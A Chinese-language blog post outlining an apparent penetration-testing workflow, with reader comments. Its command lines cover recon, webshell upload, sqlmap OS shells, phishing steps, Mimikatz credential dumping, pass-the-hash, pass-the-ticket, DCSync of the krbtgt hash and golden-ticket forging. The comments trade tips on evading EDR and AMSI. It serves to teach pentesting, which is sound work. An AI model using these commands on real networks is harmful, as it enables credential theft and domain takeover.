横向移动技术详解:PtH、PtT 与黄金票据

爪 爪
爪 爪
爪 爪
编辑
59
文章
0
粉丝
渗透测试351,816字数 473阅读1分34秒阅读模式
AI智能摘要
AI 生成的文章内容摘要

一、渗透测试流程概览

信息收集 → 漏洞扫描 → 初始访问 → 权限提升 → 横向移动 → 域控拿下 → 报告编写

---

二、信息收集阶段

2.1 外网信息收集

横向移动技术详解:PtH、PtT 与黄金票据

# 子域名枚举
subfinder -d target.com -o subs.txt
# 端口扫描 nmap -sS -sV -p- target.com
# 目录扫描 dirsearch -u http://target.com -e php,html,js
# 指纹识别 whatweb http://target.com

2.2 社工库查询

- 邮箱泄露查询:haveibeenpwned.com
- 密码泄露查询:dehashed.com
- 企业邮箱格式:theHarvester

---

三、初始访问

3.1 Web 漏洞利用

# 文件上传漏洞
# 上传 webshell 到 /uploads/shell.php
# SQL 注入 sqlmap -u "http://target.com/page?id=1" --os-shell
# RCE 漏洞 # Struts2、WebLogic、Fastjson 等

3.2 钓鱼攻击

1. 伪造登录页面
2. 发送钓鱼邮件
3. 获取员工凭证
4. VPN 登录内网

---

四、权限提升

4.1 Windows 提权

# 检查系统信息
systeminfo
whoami /priv
# 检查补丁 wmic qfe list
# 查找可执行文件 accesschk.exe -uwcqv "Authenticated Users" * /accepteula

4.2 linux 提权

# 检查内核版本
uname -a

# 检查 sudo 权限 sudo -l
# 检查 SUID 文件 find / -perm -u=s -type f 2>/dev/null
# 检查 cron 任务 cat /etc/crontab

---

五、横向移动

5.1 凭证窃取

# Mimikatz 抓取密码
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
# 导出 hash mimikatz # lsadump::sam

5.2 传递攻击

# PtH(传递 hash)
mimikatz # sekurlsa::pth /user:admin /domain:target /ntlm:HASH
# PtT(传递票据) mimikatz # kerberos::ptt admin.ccache

---

六、域控拿下

6.1 域信息收集

# 查看域信息
net domain
nltest /domain_trusts
# 查看域控 nltest /dclist:target.com
# 查看域用户 net user /domain

6.2 黄金票据

# 获取 krbtgt hash
mimikatz # lsadump::dcsync /domain:target.com /user:krbtgt
# 生成黄金票据 mimikatz # kerberos::golden /user:admin /domain:target.com /sid:xxx /krbtgt:xxx

---

七、报告编写

7.1 报告结构

1. 执行摘要
2. 漏洞列表(按风险等级)
3. 详细利用过程
4. 修复建议
5. 附录(工具、命令)

---
作者:爪
分类:渗透测试
标签:内网渗透、域渗透、横向移动、提权技术、渗透测试
发布时间:2026-04-14

历年同日文章
4 月
14
 
爪 爪
  • 本文由 爪 爪 发表于2026年4月14日 13:36:24
  • crontab
  • it2021
  • it2021.com
  • nmap
  • shell
  • test
  • Web 漏洞利用
  • 信息收集
  • 子域名枚举
  • 渗透测试
  • 漏洞利用
  • 漏洞扫描
评论  35  访客  35
    • 狮子座的力量
      狮子座的力量 1

      这流程图看着就头大,PtH和PtT到底有啥区别啊?

      • 天蝎暗影
        天蝎暗影 1

        之前搞域渗透时卡在黄金票据那步,krbtgt hash死活导不出来😭

        • 飞鸿踏雪
          飞鸿踏雪 0

          mimikatz现在还能直接用?不是早被EDR盯死了吗🤔

            • 暗夜执刑者
              暗夜执刑者 1

              @ 飞鸿踏雪 mimikatz现在确实难搞,得配合各种绕过手段才行

            • 紫梦轻纱
              紫梦轻纱 1

              又是命令堆砌,实测环境哪有这么顺利…

              • 自行车
                自行车 1

                内网没打补丁的Win7真香,一打一个准😂

                  • 烽火驿使
                    烽火驿使 1

                    @ 自行车 Win7早该退役了,内网还有这玩意也是离谱

                  • 害羞蔷薇
                    害羞蔷薇 0

                    求问黄金票据有效期能改吗?试了几次都超时了

                    • 镜像漫游者
                      镜像漫游者 1

                      抓hash现在基本靠dump lsass了吧,mimikatz动静太大

                      • 雷霆幻境
                        雷霆幻境 0

                        看着像教程,但没提绕过AMSI和杀软检测,新手照着做怕是要蓝屏

                        • 闪电划空
                          闪电划空 1

                          太硬核了,我还在信息收集阶段挣扎…

                            • 心比天高
                              心比天高 0

                              @ 闪电划空 信息收集阶段+1,子域名枚举经常跑半天全是cdn😂

                            • 霸道的棉花糖
                              霸道的棉花糖 1

                              那个电路板图还挺酷,锁和钥匙的设计有点意思👍

                              • 果冻小企鹅
                                果冻小企鹅 1

                                PtH是拿hash直接登录,PtT是拿票据,这俩底层不一样啊

                                • 狰狩
                                  狰狩 0

                                  黄金票据那步krbtgt hash导不出来太真实了,权限不够吧

                                  • 咒语之影
                                    咒语之影 0

                                    那个图设计得确实可以,比纯文字好懂多了

                                    • 夜之影舞
                                      夜之影舞 0

                                      EDR现在查mimikatz特征码挺狠的,得改改再用

                                      • 蒲公英精灵
                                        蒲公英精灵 1

                                        报告编写那段太真实了,修建议写来写去就那几句

                                        • 清风巷
                                          清风巷 1

                                          dirsearch现在用ffuf更多吧,速度差不少

                                          • 摸鱼小能仕
                                            摸鱼小能仕 1

                                            绕过AMSI这块确实该讲讲,不然新手直接寄

                                            • Psycheflare
                                              Psycheflare 1

                                              这命令堆得有点多,新手看着容易懵。

                                              • 薄荷小鹿
                                                薄荷小鹿 1

                                                现在还用 mimikatz 直接跑?不被杀软秒删才怪。

                                                • 塞外牧歌
                                                  塞外牧歌 0

                                                  黄金票据那步要是没域管权限根本搞不定吧?

                                                  • 疯狂的蚂蚁
                                                    疯狂的蚂蚁 0

                                                    之前搞内网渗透,光绕 AMSI 就折腾了我两天😭。

                                                    • 幻光巫女
                                                      幻光巫女 2

                                                      图倒是挺好看,就是实操起来全是坑。

                                                      • 幽梦穿梭
                                                        幽梦穿梭 1

                                                        PtH 和 PtT 到底选哪个更稳点?🤔

                                                        • 远航的鸥
                                                          远航的鸥 1

                                                          报告里修复建议那块,每次写得我都想吐。

                                                          • Crimson Blossom
                                                            Crimson Blossom 1

                                                            Win7 确实好打,但现在哪还有多少没补丁的。

                                                            • 水瓶革新
                                                              水瓶革新 1

                                                              dump lsass 现在也得小心内存扫描了吧。

                                                              • 旅梦人
                                                                旅梦人 1

                                                                感觉少了点绕过 EDR 的思路,光给命令不够啊。

                                                                • 玫瑰红霞
                                                                  玫瑰红霞 1

                                                                  kerbtgt hash 导不出来是不是因为权限不够?

                                                                  • 糖豆跳跳虎
                                                                    糖豆跳跳虎 1

                                                                    这流程看着顺,实际环境里断网隔离咋整?

                                                                    • 乒乓乓
                                                                      乒乓乓 1

                                                                      黄金票据那步 sid 填错过好几次,坑得要死

                                                                        • 爪 爪
                                                                          爪 爪

                                                                          @ 乒乓乓 sid 填错很常见,先确认域的 SID 再生成票据就不会踩坑了

                                                                        • 饭盒
                                                                          饭盒 1

                                                                          PtH 和 PtT 的票据传递实际用起来挺绕的,容易卡壳

                                                                        匿名

                                                                        发表评论

                                                                        匿名网友

                                                                        拖动滑块以完成验证